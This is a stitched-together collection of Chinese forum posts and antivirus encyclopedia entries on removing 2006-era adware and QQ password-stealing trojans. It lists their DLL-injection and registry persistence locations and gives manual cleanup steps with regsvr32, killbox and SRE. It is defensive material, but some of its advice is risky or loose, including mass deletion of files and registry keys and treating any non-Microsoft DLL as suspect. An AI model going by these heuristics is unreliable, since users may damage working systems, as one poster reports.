其中，%Temp%\\RarSFX0\\dtservice.dll应该是主程序吧，在Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run下建立有启动项，%System%\\dtap.dll注册为BHO，%Temp%\\RarSFX0\\ext\\dtdl.dll和%Temp%\\RarSFX0\\ext\\dtsm.dll会被调用注入Explorer.exe进程，而%Windows%\\dtapconfig则是一个广告配置文件。
由于出现了变种和病毒插件本身的升级,前几次在提问区曾遇到过些龙友中了该病毒,曾按常规的解决方法建议用HIJACKTHIS扫描和MSCONFIG查看启动项目但没查到,当时觉得纳闷..昨晚通过远程协助亲自操刀帮朋友宰杀了该病毒..用系统安全修复软件System Repair Engineer软件(简称SRE,由连续两年获得Microsoft MVP（微软最有价值专家）称号的Smallfrogs编写的)扫描发现了用HIJACKTHIS都扫描不到的启动项目如下:
[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run]
<DTService><rundll32.exe C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\DTSERV~1.DLL,Load>
以下两项是病毒插入到系统进程explorer.exe的扫描报告,因此给清理造成了一定的困难,清理不彻底的话容易反复发作

清除办法
方法一:
找到C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\目录并把它改名，搜索dtapconfig,dtap.dll,dtservice.dll,dtdl.dll,dtsm.dll全部改一下名字，接下来重新启动一下计算机，重启后就可以直接删除刚才改名的C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\目录和搜索到的上述提到的文件了，然后用SRE修复下启动项[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run]
<DTService><rundll32.exe C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\DTSERV~1.DLL,Load>

用SRE修复“浏览器加载项”里的%System%\\dtap.dll项目。

方法二:
用SRE修复启动项[HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run]
<DTService><rundll32.exe C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\DTSERV~1.DLL,Load>

用SRE修复“浏览器加载项”里的%System%\\dtap.dll项目。

事先搜索dtapconfig,dtap.dll,dtservice.dll,dtdl.dll,dtsm.dll的位置(因为除了在临时文件夹还可能在SYSTEM32目录)
记录下位置,任务栏管理器—>结束explorer.exe程序,—->文件—>新任务—>浏览—->到[C:\\DOCUME~1\\win\\LOCALS~1\\Temp\\RarSFX0\\目录,和刚刚记录下的搜索到SYSTEM32的位置全部删除找到的DT相关文件.
最后就是打扫战场清理注册表残余了:注册表--编辑--依次查找--->dtapconfig,dtap.dll,dtservice.dll,dtdl.dll,dtsm.dll找到一个删除一个(当然得看清楚是不是DT相关项再删除.是删除DT的键项,可不要把它前面的根键项也给删除了.如:HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\DTSERV~1.DLL,是删除RUN下的DT键项,而不是POLOCES.)

总结：杀毒软件几乎每天都在更新升级，而流氓恶意软件和病毒插件也同样在更新变种。新近的流氓恶意软件里普遍带有自我联网下载更新文件以变种加强保护的机制。。正与邪始终处于矛盾螺旋斗争交替上升中。。中国有句俗话叫：道高一尺，魔高一丈。这点从近来有的流氓恶意插件已经可以逃过HIJACKTHIS扫描就可以说明问题。。但没关系，如果HIJACKTHIS扫描不出来可以用System Repair Engineer。System Repair Engineer对一些隐藏的远程注入线程的无进程木马或病毒也同样很有威力。因此没有绝对百分百有效的安全工具。要知道黑客们或木马病毒或流氓软件的作者们也在研究着我们手里的安全反劫持工具。所以大家不要抱着一颗树吊死。灵活运用各种安全工具，如：hijackthis,SRE,UPIEA,流氓软件清理助手，黄山IE修复，超级兔子IE修复等互相配合取长补短把可恶霸道的流氓恶意软件赶出我们的系统。
很多广告类的软件都是带有自己的卸载程序的，只不过一般不会出现在开始菜单中，我们遇到这种问题，不要急着使用各种修复工具进行修复和强行删除，这样反而有可能造成清除不完全，残留不少垃圾信息，首先看一下它的操作界面中是否有卸载项，比如：百度搜霸
再看控制面版的添加删除程序中是否有卸载信息，比如：“MMSAssist”、划词搜索
再找到它的安装目录，看是否有卸载程序，名字一般为uninstall.exe或uninst.exe 比如：青娱乐、桌面传媒……
进行过以上操作，找不到卸载程序或清除不彻底的，再使用修复工具，可以事半功倍。
O2 - BH MacroMediapd - &leftsign;B8CCDD47-38E4-4CD2-B7FA-3B4B690F74BD&rightsign; - C:\\WINDOWS\\system32\\microapmddt.dll(　　microapmddt.dll 这个文件看起来是值得怀疑的,建议修复并删除)

从开始->运行，
输入
regsvr32 /u microapmddt.dll
断开动态链接。
然后手动在注册表去掉键值：
从开始->运行，
输入
regedit
打开窗口上，点菜单栏文件，导出命名先备份一次你的注册表。
点击编辑->查看
输入
microapmddt.dll
把找到的键值删除
按F3继续，直到完成。
重启电脑现看看能否把microapmddt.dll删除。
楼主，解决办法贴出来大家学习一下嘛我是装了官方网站的FOXMAIL6。0后被害的，频繁弹出广告，用兔子查到microapmddt.dll，用过各种方法，就是杀不干净，被害惨了大家要慎用FOXMAIL6。0！！！！！
原理：这是一种比较阴险的隐藏病毒的方式，比较专业的名称叫：DLL注入。

根源文件：C:\\WINNT\\system32\\microapmddt.dll，可以使用windows进程管理工具逐一分析IE加载的DLL，然后查看这些DLL文件的属性，只要不是Microsoft公司的，一般就有问题。但是这样做效率很低，所以那天我花了一个晚上的时间，^_^。据说用HIJACKTHIS和系统安全修复软件System Repair Engineer软件(简称SRE,由连续两年获得Microsoft MVP（微软最有价值专家）称号的Smallfrogs编写的)扫描可以发现并修复，但我没有试过。

分析：（我把清除该流氓软件的过程分为以下几个思路）

1、清除microapmddt.dll：

用killbox删除，要重新启动才可以彻底删除；
如果使用ntfs分区，请将该文件的权限全部去掉，呵呵，无论谁都不能访问；
反注册该文件，命令格式：regsvr32 /u。
2、清除注册表；

将所有与microapmddt.dll相关的键值；
删除[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects]的相关键值，这里放的是浏览器的扩展功能，即外挂。
3、考虑到进程保护的可能，先要将系统中的陌生进程停止，最好放在开机后马上操作，或者在安全模式中，一次不成功可以操作多次。

清理时发现microapmddt.dll无法清除….
这也不怕,我用上了killbox,立即杀了这个DLL文件.
但是用清理助手一查,发现注册表中还有一项没搞掉
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run
在这里有个dtservic.dll的文件和explorer绑在一起(TMD,难怪在进程里老是找不到木马)
点删除.注册表说不让删!
嘿嘿,我再次调出killbox,又删了dtservic.dll
再点删除,注册表还是不让删
哈!那我先注销windows!
重登录!!!
系统提示说找不到dtservic.dll….(哈哈,当然找不到啦,刚被我删了嘛)
再进入注册表!
删除HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer\\Run下相应的键值.
OK!
kiss goodbye劫持IE的恶心流氓软件
 
现在好像流行利用DLL注入的恶心流氓软件来劫持IE,给你加个工具条什么的,或者时不时弹出一些广告窗口.自己曾经也受其刁难。后来帮别人和自己搞过几次,由于太懒，一直没有写个笔记,现在又有人问我,就简单写个备忘.
使用工具:
Hijackthis， killbox
流程:
1.利用Hijackthis扫描系统加载的dll，找出有问题的东东。注意，hijackthis找出来的只是嫌疑犯，不要认为找出来的就一定是流氓，不然误删了系统文件不要照我索赔哦:) 这里有一个小技巧，查看这些文件的属性，不要动Microsoft公司的。当然Hijackthis不是必备的，只要你有时间一条一条手动看dll文件属性，不是Microsoft公司的，一般就有问题。
2. 反注册该文件，命令格式：regsvr32 /u 文件路径/文件名
?? 并用用killbox删除。如果驻留内存，文件是无法手动暴力删除的，只是后就要借助killbox。
实施例：
某人本本中着，自动弹出广告窗口，而且很多短信注册的广告画面td。那日在实验室，出去大k数分钟，回来是又弹出好几个，刚好被老板看见。老板随说，“年轻人~~~~。”呵呵，某人真是比窦娥还要怨啊:)
检查之后发现，是 C:\\WINDOWS\\system32\\microapmddt.dll在作怪。(还不快去看看自己机子上有没有这个dll )
首先,卸载反注册该控件在注册表中的注册,不然只删除文件,下次启动系统时还是去尝试加载它,跳出窗口说找不到
regSvr32.exe /u C:\\WINDOWS\\system32\\microapmddt.dll
直接删除，不允许删除。于是奠出killbox，轻松删掉。
 
在ＷＩＮＤＯＷＳ下发现了几个可疑文件，

c:/windows/system/1.exe
c:/windows/system/upx.exe
c:/windows/system/kill.dll
c:/windows/system32/KB23478.LOG
…………….
没说的，删！！！！！！！！！
然后找到注册表regedit.exe，把几个可疑的启动项删掉

重启进入系统，这下卡巴终于能扫了，呵呵，２２个威胁，１８个木马，我晕～～～～～～～～～～～～

扫完后卡巴发现winlogon.exe被感染，这个是系统关键进程，杀不了，提示重启后删除，汗．．．．．．

重新启动，病毒是杀了，系统也进不了了，又拿安装盘来修复．．．．．．．．．

1024  PWS-JJ  redqq.dll W32/HLLP.Philis

今天帮同事杀毒，发现N多：

另一则弹出广告的病毒清除(redqq.dll,svcorer.exe,inteinfo.exe,794A006F.dll,MAYMEF28.DLL)
杀毒前关闭系统还原：右键 我的电脑 ，属性，系统还原，在所有驱动器上关闭系统还原 打勾即可。 
清除IE的临时文件：打开IE 点工具–>Internet选项 : Internet临时文件，点“删除文件”按钮 ，将 删除所有脱机内容 打勾，点确定删除。

1 用工具killbox 分别填入如下的文件 选择“重启后删除”。 
注意一次删多个文件的方法 看懂再操作。 （也就是你拷贝了一个文件进去后点清除，弹出的提示选NO ，直到最后一个文件输完再点YES）
killbox的下载及其用法见：
C:\\WINDOWS\\system32\\redqq.dll  这个文件务必干掉，注入到每个进程之中。
C:\\WINDOWS\\system32\\svcorer.exe
C:\\Program Files\\Common Files\\Microsoft Shared\\MSINFO\\794A006F.dll
C:\\WINDOWS\\inteinfo.exe
C:\\WINDOWS\\SYSTEM32\\WBEM\\MAYMEF28.DLL
重启计算机 然后再进入安全模式执行如下的操作 
————————————————————–
以下的操作都要求安全模式下进行。
[安全模式？重启电脑时按住F8 选择进入安全模式]
————————————————————–
2 SRENG删除 方法：
启动项目 –>注册表 
[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run] 
 <qq><C:\\WINDOWS\\system32\\svcorer.exe> [] 
 
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellExecuteHooks] 
 <&leftsign;A006794A-794A-006F-4A00-94A0694A006F&rightsign;><C:\\Program Files\\Common Files\\Microsoft Shared\\MSINFO\\794A006F.dll> [] 

启动项目 –>服务–>Win32服务应用程序

[Microsoft Update Service / iSPONER] 
 <C:\\WINDOWS\\SYSTEM32\\RUNDLL.EXE C:\\WINDOWS\\SYSTEM32\\WBEM\\MAYMEF28.DLL,Export 1087><N/A> 

[Network server / Network server] 
 <C:\\WINDOWS\\inteinfo.exe><N/A>

－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
teYqiu【天下无毒】原创文章，转载请标明。
百度知道反病毒知识专家崔衍渠 授权。

偷QQ密码的一个木马
进安全模式杀毒试试，如果还不行就只好在注册表里删除后再杀毒了
最好先“运行”——msconfig，然后看启动项里没用的东西全部不要让他开机运行。然后重新启动

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations
Manual execution of the binary, there\’s no exploit associated with this. It\’s mainly targeted at Asian "qq" users. Removal
All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).

Additional Windows ME/XP removal considerations

Detection was added to cover protection against a malicious 32 bit PE binary file originally called "227.exe " , having a filesize of 48.939 bytes decimal. The file is internally compressed with a packer. Upon running, it runs silently, no gui messageboxes or other interfaces appear. It immediately drops other malware binaries and removes itself from the location where it was run from.

It drops the files:

agetlker.exe , temp~3.exe, qj.exe    , filesize  13.516 bytes xiaran.bin                                           , filesize  19.039 bytes rastntpi.dll                                          , filesize  30 bytes The dropped files are dropped into the following locations:

%WINDIR% \\system32\\rastntpi.dll c:\\documents and settings\\%USER% \\local settings\\temp\\temp~3 c:\\documents and settings\\%USER% \\local settings\\temp\\qj.exe c:\\program files\\common files\\microsoft shared\\msinfo\\xiaran.bin %WINDIR% \\system32\\agetlker.exe The file agetlker.exe is already being triggered upon with the current DAT-4705 with Generic PWS.f trojan. The files agetlker.exe, temp~3.exe and qj.exe are byte-identical.

The file attributes for both the dropped files are set to SHR: System, Hidden and Read only to make it a bit harder to see.

To start automatically upon system start it creates the registry entry:

HKLM\\software\\microsoft\\windows\\currentversion\\run
    \\ravupteki="%WINDIR% \\System32\\agetlker.exe"
This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases
Backdoor.Win32.HacDef.084 (Ikarus) Trojan-PSW.Win32.Delf.ic (Kaspersky) Win32/PSW.QQShou (Eset)

Variants of The W32/HLLP.Philis virus create this file with the name "_desktop.ini" in every folder that they visit while looking for executable files to infect. This is created as a hidden system file and contains the date on which virus was executed to visit the folder in which the file resides. The date is shown in yyyy/mm/dd format.

Variants of W32/HLLP.Philis virus also spread via network shares. If the virus is able to access a shared resource, it first copies W32/HLLP.Philis.ini to the root of the share to mark the share as visited by the virus and then infects executables present in the share. So, in the case of a shared printer, the viruses\’ infection routine effectively creates printer job to print the date as contained in W32/HLLP.Philis.ini that the virus tries to copy.
2006-10-24 14:00:46 扫描摘要   已感染病毒的文件: 11172
2006-10-24 14:00:46 扫描摘要   文件中发现的病毒: 11172

还有 W32/pate.dam  new maleware.n 什么的

间谍软件InfoStealer

概述
别名
Infostealer.Salira [Symantec], PWS-Mafia [McAfee], Trojan-PSW.Win32.Bumaf.c [Kaspersky],

类别
Trojan : 有隐藏意图的任何程序。 特洛伊木马程序是侵入计算机的主要方式之一。 如果您的程序在访问聊天室、新的小组或阅读未经请求的邮件后被破坏，则该程序可能感染了具有某种破坏目的的特洛伊木马程序。 单词 Trojan（特洛伊）可以用作动词：要 trojan 一个程序意即向现有的程序添加破坏性功能。 例如，被 trojan 了的登录程序可能会被编程为接受某个不限定用户的特定密码，这样骇客就可以在任何时间使用该密码登录回系统。 Rootkit 经常包含像这样被 trojan 了的程序组。